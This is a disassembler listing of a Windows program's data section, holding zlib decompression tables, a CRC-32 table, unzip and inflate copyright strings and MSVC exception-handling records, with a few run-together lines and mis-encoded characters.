dword_4332C8 dd 2933BF81h, 11D27B36h, 0C0000EB2h, 603E984Fhoff_4332D8 dd offset sub_4219B0 ; DATA XREF: sub_421000+14�o
; sub_421021+A�o
off_4332DC dd offset sub_4229F0 ; DATA XREF: sub_4226B0+A�o
; sub_4226C7+A�o ...
off_4332E0 dd offset aNeedDictiona_0 ; DATA XREF: HLXc:0042DACC�r
; "need dictionary"
dd offset aStreamEnd ; "stream end"
dd offset dword_43BD38
dd offset aFileError ; "file error"
dd offset aStreamError ; "stream error"
dd offset aDataError ; "data error"
dd offset aInsufficientMe ; "insufficient memory"
dd offset aBufferError ; "buffer error"
dd offset aIncompatibleVe ; "incompatible version"
dd offset dword_43BD3C
dword_433308 dd 0 ; sub_42A17E+464�r ...
dd 1, 3, 7, 0Fh, 1Fh, 3Fh, 7Fh, 0FFh, 1FFh, 3FFh, 7FFh
dd 0FFFh, 1FFFh, 3FFFh, 7FFFh, 0FFFFh, 0
dword_433350 dd 760h, 100h, 800h, 50h, 800h, 10h, 854h, 73h, 752h, 1Fh
; DATA XREF: sub_42CF5B+18�o
dd 800h, 70h, 800h, 30h, 900h, 0C0h, 750h, 0Ah, 800h, 60h
dd 800h, 20h, 900h, 0A0h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E0h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 90h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D0h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B0h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F0h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C8h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A8h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E8h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 98h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D8h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B8h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F8h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C4h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A4h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E4h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 94h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D4h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B4h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F4h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CCh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ACh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0ECh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Ch, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DCh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BCh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FCh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C2h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A2h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E2h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 92h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D2h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B2h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F2h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CAh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0AAh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EAh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Ah, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DAh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BAh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FAh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C6h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A6h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E6h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 96h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D6h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B6h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F6h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CEh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AEh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EEh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Eh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DEh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BEh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FEh, 760h, 100h, 800h
dd 50h, 800h, 10h, 854h, 73h, 752h, 1Fh, 800h, 70h, 800h
dd 30h, 900h, 0C1h, 750h, 0Ah, 800h, 60h, 800h, 20h, 900h
dd 0A1h, 800h, 0
dd 800h, 80h, 800h, 40h, 900h, 0E1h, 750h, 6, 800h, 58h
dd 800h, 18h, 900h, 91h, 753h, 3Bh, 800h, 78h, 800h, 38h
dd 900h, 0D1h, 751h, 11h, 800h, 68h, 800h, 28h, 900h, 0B1h
dd 800h, 8, 800h, 88h, 800h, 48h, 900h, 0F1h, 750h, 4
dd 800h, 54h, 800h, 14h, 855h, 0E3h, 753h, 2Bh, 800h, 74h
dd 800h, 34h, 900h, 0C9h, 751h, 0Dh, 800h, 64h, 800h, 24h
dd 900h, 0A9h, 800h, 4, 800h, 84h, 800h, 44h, 900h, 0E9h
dd 750h, 8, 800h, 5Ch, 800h, 1Ch, 900h, 99h, 754h, 53h
dd 800h, 7Ch, 800h, 3Ch, 900h, 0D9h, 752h, 17h, 800h, 6Ch
dd 800h, 2Ch, 900h, 0B9h, 800h, 0Ch, 800h, 8Ch, 800h, 4Ch
dd 900h, 0F9h, 750h, 3, 800h, 52h, 800h, 12h, 855h, 0A3h
dd 753h, 23h, 800h, 72h, 800h, 32h, 900h, 0C5h, 751h, 0Bh
dd 800h, 62h, 800h, 22h, 900h, 0A5h, 800h, 2, 800h, 82h
dd 800h, 42h, 900h, 0E5h, 750h, 7, 800h, 5Ah, 800h, 1Ah
dd 900h, 95h, 754h, 43h, 800h, 7Ah, 800h, 3Ah, 900h, 0D5h
dd 752h, 13h, 800h, 6Ah, 800h, 2Ah, 900h, 0B5h, 800h, 0Ah
dd 800h, 8Ah, 800h, 4Ah, 900h, 0F5h, 750h, 5, 800h, 56h
dd 800h, 16h, 8C0h, 0
dd 753h, 33h, 800h, 76h, 800h, 36h, 900h, 0CDh, 751h, 0Fh
dd 800h, 66h, 800h, 26h, 900h, 0ADh, 800h, 6, 800h, 86h
dd 800h, 46h, 900h, 0EDh, 750h, 9, 800h, 5Eh, 800h, 1Eh
dd 900h, 9Dh, 754h, 63h, 800h, 7Eh, 800h, 3Eh, 900h, 0DDh
dd 752h, 1Bh, 800h, 6Eh, 800h, 2Eh, 900h, 0BDh, 800h, 0Eh
dd 800h, 8Eh, 800h, 4Eh, 900h, 0FDh, 760h, 100h, 800h
dd 51h, 800h, 11h, 855h, 83h, 752h, 1Fh, 800h, 71h, 800h
dd 31h, 900h, 0C3h, 750h, 0Ah, 800h, 61h, 800h, 21h, 900h
dd 0A3h, 800h, 1, 800h, 81h, 800h, 41h, 900h, 0E3h, 750h
dd 6, 800h, 59h, 800h, 19h, 900h, 93h, 753h, 3Bh, 800h
dd 79h, 800h, 39h, 900h, 0D3h, 751h, 11h, 800h, 69h, 800h
dd 29h, 900h, 0B3h, 800h, 9, 800h, 89h, 800h, 49h, 900h
dd 0F3h, 750h, 4, 800h, 55h, 800h, 15h, 850h, 102h, 753h
dd 2Bh, 800h, 75h, 800h, 35h, 900h, 0CBh, 751h, 0Dh, 800h
dd 65h, 800h, 25h, 900h, 0ABh, 800h, 5, 800h, 85h, 800h
dd 45h, 900h, 0EBh, 750h, 8, 800h, 5Dh, 800h, 1Dh, 900h
dd 9Bh, 754h, 53h, 800h, 7Dh, 800h, 3Dh, 900h, 0DBh, 752h
dd 17h, 800h, 6Dh, 800h, 2Dh, 900h, 0BBh, 800h, 0Dh, 800h
dd 8Dh, 800h, 4Dh, 900h, 0FBh, 750h, 3, 800h, 53h, 800h
dd 13h, 855h, 0C3h, 753h, 23h, 800h, 73h, 800h, 33h, 900h
dd 0C7h, 751h, 0Bh, 800h, 63h, 800h, 23h, 900h, 0A7h, 800h
dd 3, 800h, 83h, 800h, 43h, 900h, 0E7h, 750h, 7, 800h
dd 5Bh, 800h, 1Bh, 900h, 97h, 754h, 43h, 800h, 7Bh, 800h
dd 3Bh, 900h, 0D7h, 752h, 13h, 800h, 6Bh, 800h, 2Bh, 900h
dd 0B7h, 800h, 0Bh, 800h, 8Bh, 800h, 4Bh, 900h, 0F7h, 750h
dd 5, 800h, 57h, 800h, 17h, 8C0h, 0
dd 753h, 33h, 800h, 77h, 800h, 37h, 900h, 0CFh, 751h, 0Fh
dd 800h, 67h, 800h, 27h, 900h, 0AFh, 800h, 7, 800h, 87h
dd 800h, 47h, 900h, 0EFh, 750h, 9, 800h, 5Fh, 800h, 1Fh
dd 900h, 9Fh, 754h, 63h, 800h, 7Fh, 800h, 3Fh, 900h, 0DFh
dd 752h, 1Bh, 800h, 6Fh, 800h, 2Fh, 900h, 0BFh, 800h, 0Fh
dd 800h, 8Fh, 800h, 4Fh, 900h, 0FFh
dword_434350 dd 550h, 1, 557h, 101h, 553h, 11h, 55Bh, 1001h, 551h, 5
; DATA XREF: sub_42CF5B+21�o
dd 559h, 401h, 555h, 41h, 55Dh, 4001h, 550h, 3, 558h, 201h
dd 554h, 21h, 55Ch, 2001h, 552h, 9, 55Ah, 801h, 556h, 81h
dd 5C0h, 6001h, 550h, 2, 557h, 181h, 553h, 19h, 55Bh, 1801h
dd 551h, 7, 559h, 601h, 555h, 61h, 55Dh, 6001h, 550h, 4
dd 558h, 301h, 554h, 31h, 55Ch, 3001h, 552h, 0Dh, 55Ah
dd 0C01h, 556h, 0C1h, 5C0h, 6001h
dword_434450 dd 10h ; sub_42B09D+A13�r
dd 11h, 12h, 0
dd 8, 7, 9, 6, 0Ah, 5, 0Bh, 4, 0Ch, 3, 0Dh, 2, 0Eh, 1
dd 0Fh
aInflate1_1_3Co db ' inflate 1.1.3 Copyright 1995-1998 Mark Adler ',0
align 4
dword_4344CC dd 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Dh, 0Fh, 11h, 13h, 17h
; DATA XREF: sub_42CDD6+50�o
dd 1Bh, 1Fh, 23h, 2Bh, 33h, 3Bh, 43h, 53h, 63h, 73h, 83h
dd 0A3h, 0C3h, 0E3h, 102h, 2 dup(0)
dword_434548 dd 8 dup(0) dd 4 dup(1), 4 dup(2), 4 dup(3), 4 dup(4), 4 dup(5), 0
dd 2 dup(70h)
dword_4345C4 dd 1, 2, 3, 4, 5, 7, 9, 0Dh, 11h, 19h, 21h, 31h, 41h, 61h
; DATA XREF: sub_42CDD6+D9�o
dd 81h, 0C1h, 101h, 181h, 201h, 301h, 401h, 601h, 801h
dd 0C01h, 1001h, 1801h, 2001h, 3001h, 4001h, 6001h
dword_43463C dd 4 dup(0) dd 2 dup(1), 2 dup(2), 2 dup(3), 2 dup(4), 2 dup(5), 2 dup(6)
dd 2 dup(7), 2 dup(8), 2 dup(9), 2 dup(0Ah), 2 dup(0Bh)
dd 2 dup(0Ch), 2 dup(0Dh)
dword_4346B4 dd 0 ; sub_42D665+3A�r ...
dd 77073096h, 0EE0E612Ch, 990951BAh, 76DC419h, 706AF48Fh
dd 0E963A535h, 9E6495A3h, 0EDB8832h, 79DCB8A4h, 0E0D5E91Eh
dd 97D2D988h, 9B64C2Bh, 7EB17CBDh, 0E7B82D07h, 90BF1D91h
dd 1DB71064h, 6AB020F2h, 0F3B97148h, 84BE41DEh, 1ADAD47Dh
dd 6DDDE4EBh, 0F4D4B551h, 83D385C7h, 136C9856h, 646BA8C0h
dd 0FD62F97Ah, 8A65C9ECh, 14015C4Fh, 63066CD9h, 0FA0F3D63h
dd 8D080DF5h, 3B6E20C8h, 4C69105Eh, 0D56041E4h, 0A2677172h
dd 3C03E4D1h, 4B04D447h, 0D20D85FDh, 0A50AB56Bh, 35B5A8FAh
dd 42B2986Ch, 0DBBBC9D6h, 0ACBCF940h, 32D86CE3h, 45DF5C75h
dd 0DCD60DCFh, 0ABD13D59h, 26D930ACh, 51DE003Ah, 0C8D75180h
dd 0BFD06116h, 21B4F4B5h, 56B3C423h, 0CFBA9599h, 0B8BDA50Fh
dd 2802B89Eh, 5F058808h, 0C60CD9B2h, 0B10BE924h, 2F6F7C87h
dd 58684C11h, 0C1611DABh, 0B6662D3Dh, 76DC4190h, 1DB7106h
dd 98D220BCh, 0EFD5102Ah, 71B18589h, 6B6B51Fh, 9FBFE4A5h
dd 0E8B8D433h, 7807C9A2h, 0F00F934h, 9609A88Eh, 0E10E9818h
dd 7F6A0DBBh, 86D3D2Dh, 91646C97h, 0E6635C01h, 6B6B51F4h
dd 1C6C6162h, 856530D8h, 0F262004Eh, 6C0695EDh, 1B01A57Bh
dd 8208F4C1h, 0F50FC457h, 65B0D9C6h, 12B7E950h, 8BBEB8EAh
dd 0FCB9887Ch, 62DD1DDFh, 15DA2D49h, 8CD37CF3h, 0FBD44C65h
dd 4DB26158h, 3AB551CEh, 0A3BC0074h, 0D4BB30E2h, 4ADFA541h
dd 3DD895D7h, 0A4D1C46Dh, 0D3D6F4FBh, 4369E96Ah, 346ED9FCh
dd 0AD678846h, 0DA60B8D0h, 44042D73h, 33031DE5h, 0AA0A4C5Fh
dd 0DD0D7CC9h, 5005713Ch, 270241AAh, 0BE0B1010h, 0C90C2086h
dd 5768B525h, 206F85B3h, 0B966D409h, 0CE61E49Fh, 5EDEF90Eh
dd 29D9C998h, 0B0D09822h, 0C7D7A8B4h, 59B33D17h, 2EB40D81h
dd 0B7BD5C3Bh, 0C0BA6CADh, 0EDB88320h, 9ABFB3B6h, 3B6E20Ch
dd 74B1D29Ah, 0EAD54739h, 9DD277AFh, 4DB2615h, 73DC1683h
dd 0E3630B12h, 94643B84h, 0D6D6A3Eh, 7A6A5AA8h, 0E40ECF0Bh
dd 9309FF9Dh, 0A00AE27h, 7D079EB1h, 0F00F9344h, 8708A3D2h
dd 1E01F268h, 6906C2FEh, 0F762575Dh, 806567CBh, 196C3671h
dd 6E6B06E7h, 0FED41B76h, 89D32BE0h, 10DA7A5Ah, 67DD4ACCh
dd 0F9B9DF6Fh, 8EBEEFF9h, 17B7BE43h, 60B08ED5h, 0D6D6A3E8h
dd 0A1D1937Eh, 38D8C2C4h, 4FDFF252h, 0D1BB67F1h, 0A6BC5767h
dd 3FB506DDh, 48B2364Bh, 0D80D2BDAh, 0AF0A1B4Ch, 36034AF6h
dd 41047A60h, 0DF60EFC3h, 0A867DF55h, 316E8EEFh, 4669BE79h
dd 0CB61B38Ch, 0BC66831Ah, 256FD2A0h, 5268E236h, 0CC0C7795h
dd 0BB0B4703h, 220216B9h, 5505262Fh, 0C5BA3BBEh, 0B2BD0B28h
dd 2BB45A92h, 5CB36A04h, 0C2D7FFA7h, 0B5D0CF31h, 2CD99E8Bh
dd 5BDEAE1Dh, 9B64C2B0h, 0EC63F226h, 756AA39Ch, 26D930Ah
dd 9C0906A9h, 0EB0E363Fh, 72076785h, 5005713h, 95BF4A82h
dd 0E2B87A14h, 7BB12BAEh, 0CB61B38h, 92D28E9Bh, 0E5D5BE0Dh
dd 7CDCEFB7h, 0BDBDF21h, 86D3D2D4h, 0F1D4E242h, 68DDB3F8h
dd 1FDA836Eh, 81BE16CDh, 0F6B9265Bh, 6FB077E1h, 18B74777h
dd 88085AE6h, 0FF0F6A70h, 66063BCAh, 11010B5Ch, 8F659EFFh
dd 0F862AE69h, 616BFFD3h, 166CCF45h, 0A00AE278h, 0D70DD2EEh
dd 4E048354h, 3903B3C2h, 0A7672661h, 0D06016F7h, 4969474Dh
dd 3E6E77DBh, 0AED16A4Ah, 0D9D65ADCh, 40DF0B66h, 37D83BF0h
dd 0A9BCAE53h, 0DEBB9EC5h, 47B2CF7Fh, 30B5FFE9h, 0BDBDF21Ch
dd 0CABAC28Ah, 53B39330h, 24B4A3A6h, 0BAD03605h, 0CDD70693h
dd 54DE5729h, 23D967BFh, 0B3667A2Eh, 0C4614AB8h, 5D681B02h
dd 2A6F2B94h, 0B40BBE37h, 0C30C8EA1h, 5A05DF1Bh, 2D02EF8Dh
byte_434AB4 db 20h ; DATA XREF: sub_42EBC2:loc_42EBDA�r
aUnzip0_15Copyr db 'unzip 0.15 Copyright 1998 Gilles Vollant ',0
align 10h
dd offset dword_434B30
off_434AE4 dd offset sub_4316CF ; DATA XREF: HLXc:00437020�o
; HLXc:off_437030�o ...
dword_434AE8 dd 0FFFFFFFFh, 4318F8h, 43190Ch, 434B78hoff_434AF8 dd offset sub_431B9A ; DATA XREF: sub_431B68+12�o
; HLXc:00431BCF�o ...
align 10h
off_434B00 dd offset off_437C10 ; DATA XREF: HLXc:00434B18�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_434B00
dword_434B1C dd 3 dup(0) dd 1, 434B18h
dword_434B30 dd 3 dup(0) dd offset off_437C10
dd offset dword_434B1C+4
align 8
off_434B48 dd offset off_437C48 ; DATA XREF: HLXc:00434B60�o
dd 2 dup(0)
dd 0FFFFFFFFh, 2 dup(0)
dd offset off_434B48
dd 0
db 0 ; DATA XREF: HLXc:00434B88�o
db 0
db 0
db 0
db 0
db 0
db 0
db 0
dd 1, 434B60h, 3 dup(0)
dd offset off_437C48
dd offset unk_434B68
align 10h
dword_434B90 dd 19930520h, 2, 434BB0h, 1, 434BC0h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 434BD8h, 4 dup(0)
dd offset loc_42119D
dword_434BE8 dd 19930520h, 2, 434C08h, 1, 434C18h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 434C30h, 4 dup(0)
dd offset loc_421245
dword_434C40 dd 19930520h, 3, 434C60h, 1, 434C78h, 3 dup(0) dd 0FFFFFFFFh, 431C24h, 4 dup(0)
dd 2 dup(1), 2, 1, 434C90h, 4 dup(0)
dd offset loc_421402
dword_434CA0 dd 19930520h, 2, 434CC0h, 1, 434CD0h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 434CE8h, 4 dup(0)
dd offset loc_4215A1
dword_434CF8 dd 19930520h, 2, 434D18h, 1, 434D28h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 434D40h, 4 dup(0)
dd offset loc_4217D7
dword_434D50 dd 19930520h, 2, 434D70h, 1, 434D80h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 434D98h, 4 dup(0)
dd offset loc_421966
dd 1, 437020h, 0
dd 0FFFFFFFFh, 0
dd 4, 2 dup(0)
dword_434DC8 dd 1, 434DA8h dword_434DD0 dd 3 dup(0) ; HLXc:004212E6�o ...
dd offset dword_434DC8
dword_434DE0 dd 19930520h, 2, 434E00h, 1, 434E10h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 434E28h, 2 dup(0)
dd offset off_437030
dd 0FFFFFEC0h, 421D58h
dword_434E38 dd 19930520h, 4, 434E58h, 5 dup(0) dd 0FFFFFFFFh, 431C85h, 0
dd offset sub_431C6A
dd 1, 431C73h, 2, 431C7Ch
dword_434E78 dd 19930520h, 0Bh, 434E98h, 5 dup(0) dd 0FFFFFFFFh, 431CA8h, 0
dd offset loc_431CB0
dd 1, 431CBBh, 2, 431CC6h, 3, 431CD1h, 4, 431CDCh, 5, 431CE7h
dd 6, 431CF2h, 7, 431CFDh, 8, 431D0Bh, 9, 431D13h
dword_434EF0 dd 19930520h, 8, 434F10h, 5 dup(0) dd 0FFFFFFFFh, 431D28h, 0
dd offset loc_431D30
dd 1, 431D3Bh, 2, 431D46h, 3, 431D51h, 4, 431D5Ch, 5, 431D67h
dd 6, 431D72h
dword_434F50 dd 19930520h, 2, 434F70h, 1, 434F80h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 434F98h, 4 dup(0)
dd offset loc_422EAA
dword_434FA8 dd 19930520h, 3, 434FC8h, 5 dup(0) dd 0FFFFFFFFh, 431DA4h, 0
dd offset loc_431D94
dd 1, 431D9Ch
dword_434FE0 dd 19930520h, 4, 435000h, 5 dup(0) dd 0FFFFFFFFh, 431DE0h, 0
dd offset loc_431DC8
dd 1, 431DD0h, 2, 431DD8h
dword_435020 dd 19930520h, 20h, 435040h, 5 dup(0) dd 0FFFFFFFFh, 431E04h, 0
dd offset loc_431E0C
dd 1, 431E14h, 1, 431E1Fh, 1, 431E2Ah, 1, 431E35h, 1, 431E40h
dd 1, 431E48h, 1, 431E53h, 1, 431E5Bh, 1, 431E66h, 1, 431E71h
dd 1, 431E79h, 1, 431E84h, 1, 431E8Ch, 0Eh, 431E94h, 0Fh
dd 431E9Ch, 0Fh, 431EA7h, 0Fh, 431EB2h, 0Fh, 431EBDh, 0Fh
dd 431EC8h, 0Fh, 431ED3h, 0Fh, 431EDEh, 0Fh, 431EE9h, 0Fh
dd 431EF4h, 0Fh, 431EFCh, 0Fh, 431F04h, 0Fh, 431F0Ch, 0Fh
dd 431F14h, 0Fh, 431F1Ch, 0Fh, 431F27h, 0Fh, 431F32h
dword_435140 dd 19930520h, 1, 435160h, 5 dup(0) dd 0FFFFFFFFh, 431F48h
dword_435168 dd 19930520h, 1, 435188h, 5 dup(0) dd 0FFFFFFFFh, 431F5Ch
dword_435190 dd 19930520h, 4, 4351B0h, 5 dup(0) dd 0FFFFFFFFh, 431F70h, 0
dd offset loc_431F78
dd 1, 431F80h, 1, 431F88h
dword_4351D0 dd 19930520h, 0Eh, 4351F0h, 5 dup(0) dd 0FFFFFFFFh, 431F9Ch, 0
dd offset loc_431FA4
dd 0FFFFFFFFh, 431FACh, 2, 431FB4h, 3, 431FBCh, 3, 431FC4h
dd 3, 431FCCh, 3, 431FD4h, 7, 431FDCh, 8, 431FE4h, 7, 431FECh
dd 7, 431FF4h, 7, 431FFFh, 7, 432007h
dword_435260 dd 19930520h, 2, 435280h, 5 dup(0) dd 0FFFFFFFFh, 43201Ch, 0
dd offset loc_432024
dword_435290 dd 19930520h, 0Bh, 4352B0h, 5 dup(0) dd 0FFFFFFFFh, 432038h, 0
dd offset loc_432040
dd 1, 432048h, 2, 432050h, 3, 43205Bh, 3, 432063h, 3, 43206Bh
dd 6, 432076h, 6, 43207Eh, 6, 432086h, 9, 432091h
dword_435308 dd 19930520h, 0Ah, 435328h, 5 dup(0) dd 0FFFFFFFFh, 4320A4h, 0
dd offset loc_4320AC
dd 1, 4320B4h, 2, 4320BCh, 2, 4320C4h, 4, 4320CCh, 5, 4320D4h
dd 6, 4320DCh, 6, 4320E4h, 8, 4320ECh
dword_435378 dd 19930520h, 6, 435398h, 5 dup(0) dd 0FFFFFFFFh, 432128h, 0
dd offset loc_432100
dd 1, 432108h, 1, 432110h, 3, 432118h, 4, 432120h
dword_4353C8 dd 19930520h, 2, 4353E8h, 5 dup(0) dd 0FFFFFFFFh, 43214Ch, 0
dd offset loc_432154
dword_4353F8 dd 19930520h, 6, 435418h, 5 dup(0) dd 0FFFFFFFFh, 432190h, 0
dd offset loc_432168
dd 1, 432170h, 1, 432178h, 3, 432180h, 4, 432188h
dword_435448 dd 19930520h, 6, 435468h, 5 dup(0) dd 0FFFFFFFFh, 4321DCh, 0
dd offset loc_4321B4
dd 1, 4321BCh, 1, 4321C4h, 3, 4321CCh, 4, 4321D4h
dword_435498 dd 19930520h, 8, 4354B8h, 5 dup(0) dd 0FFFFFFFFh, 432200h, 0
dd offset loc_432208
dd 1, 432210h, 1, 432218h, 3, 432220h, 4, 432228h, 4, 432230h
dd 6, 432238h
dword_4354F8 dd 19930520h, 6, 435518h, 5 dup(0) dd 0FFFFFFFFh, 43224Ch, 0
dd offset loc_432254
dd 1, 43225Ch, 1, 432264h, 3, 43226Ch, 4, 432274h
dword_435548 dd 19930520h, 6, 435568h, 5 dup(0) dd 0FFFFFFFFh, 4322B0h, 0
dd offset loc_432288
dd 1, 432290h, 1, 432298h, 3, 4322A0h, 4, 4322A8h
dword_435598 dd 19930520h, 3, 4355B8h, 5 dup(0) dd 0FFFFFFFFh, 4322D4h, 0
dd offset loc_4322DC
dd 1, 4322E4h
dword_4355D0 dd 19930520h, 16h, 4355F0h, 5 dup(0) dd 0FFFFFFFFh, 4322F8h, 0
dd offset loc_432300
dd 1, 432308h, 2, 432310h, 3, 432318h, 3, 432320h, 3, 432328h
dd 6, 432330h, 3, 432338h, 3, 432340h, 3, 432348h, 0Ah
dd 432350h, 0Bh, 432358h, 0Bh, 432360h, 0Bh, 432368h, 0Eh
dd 432370h, 0Fh, 432378h, 0Eh, 0
dd 0Eh, 0
dd 0Eh, 432380h, 0Eh, 0
dd 0Eh, 0
dword_4356A0 dd 19930520h, 2, 4356C0h, 1, 4356D0h, 3 dup(0) dd 0FFFFFFFFh, 0
dd 0FFFFFFFFh, 3 dup(0)
dd 2 dup(1), 4356E8h, 4 dup(0)
dd offset sub_42648B
dword_4356F8 dd 19930520h, 1, 435718h, 5 dup(0) dd 0FFFFFFFFh, 4323A0h
dword_435720 dd 19930520h, 4, 435740h, 5 dup(0) dd 0FFFFFFFFh, 4323B3h, 0
dd offset loc_4323BC
dd 1, 4323C5h, 1, 4323CEh
dword_435760 dd 19930520h, 3, 435780h, 5 dup(0) dd 0FFFFFFFFh, 4323E1h, 0
dd offset loc_4323EA
dd 1, 4323F6h
dword_435798 dd 19930520h, 7, 4357B8h, 5 dup(0) dd 0FFFFFFFFh, 43240Ch, 0
dd offset loc_432415
dd 1, 43241Eh, 2, 432427h, 3, 432433h, 4, 43243Fh, 4, 432448h
dword_4357F0 dd 19930520h, 2, 435810h, 5 dup(0) dd 0FFFFFFFFh, 43245Bh, 0
dd offset loc_432464
dword_435820 dd 19930520h, 1, 435840h, 5 dup(0) dd 0FFFFFFFFh, 43247Ah
dword_435848 dd 19930520h, 1, 435868h, 5 dup(0) dd 0FFFFFFFFh, 43248Dh
dword_435870 dd 19930520h, 1, 435890h, 5 dup(0) dd 0FFFFFFFFh, 4324A0h
dword_435898 dd 19930520h, 4, 4358B8h, 5 dup(0) dd 0FFFFFFFFh, 4324B3h, 0
dd offset loc_4324BC
dd 1, 4324C5h, 1, 4324CEh
dword_4358D8 dd 19930520h, 1, 4358F8h, 5 dup(0) dd 0FFFFFFFFh, 4324E1h
dword_435900 dd 19930520h, 4, 435920h, 5 dup(0) dd 0FFFFFFFFh, 4324F4h, 0
dd offset loc_4324FD
dd 1, 432506h, 1, 43250Fh
dword_435940 dd 19930520h, 3, 435960h, 5 dup(0) dd 0FFFFFFFFh, 432522h, 0
dd offset loc_43252B
dd 1, 432538h
dword_435978 dd 19930520h, 7, 435998h, 5 dup(0) dd 0FFFFFFFFh, 43254Fh, 0
dd offset loc_432559
dd 1, 432563h, 2, 43256Ch, 3, 432579h, 4, 432586h, 4, 432590h
dword_4359D0 dd 19930520h, 2, 4359F0h, 5 dup(0) dd 0FFFFFFFFh, 4325A4h, 0
dd offset loc_4325AD
dword_435A00 dd 19930520h, 1, 435A20h, 5 dup(0) dd 0FFFFFFFFh, 4325C4h
dword_435A28 dd 19930520h, 1, 435A48h, 5 dup(0) dd 0FFFFFFFFh, 4325D8h
dword_435A50 dd 19930520h, 1, 435A70h, 5 dup(0) dd 0FFFFFFFFh, 4325ECh
dword_435A78 dd 19930520h, 4, 435A98h, 5 dup(0) dd 0FFFFFFFFh, 4325FFh, 0
dd offset loc_432609
dd 1, 432612h, 1, 43261Ch
dword_435AB8 dd 19930520h, 1, 435AD8h, 5 dup(0) dd 0FFFFFFFFh, 432630h
dword_435AE0 dd 19930520h, 1, 435B00h, 5 dup(0) dd 0FFFFFFFFh, 432650h
dword_435B08 dd 19930520h, 1, 435B28h, 5 dup(0) dd 0FFFFFFFFh, 432670h
dword_435B30 dd 19930520h, 1, 435B50h, 5 dup(0) dd 0FFFFFFFFh, 432690h
dword_435B58 dd 19930520h, 3, 435B78h, 5 dup(0) dd 0FFFFFFFFh, 4326B0h, 0
dd offset loc_4326BC
dd 1, 4326C8h
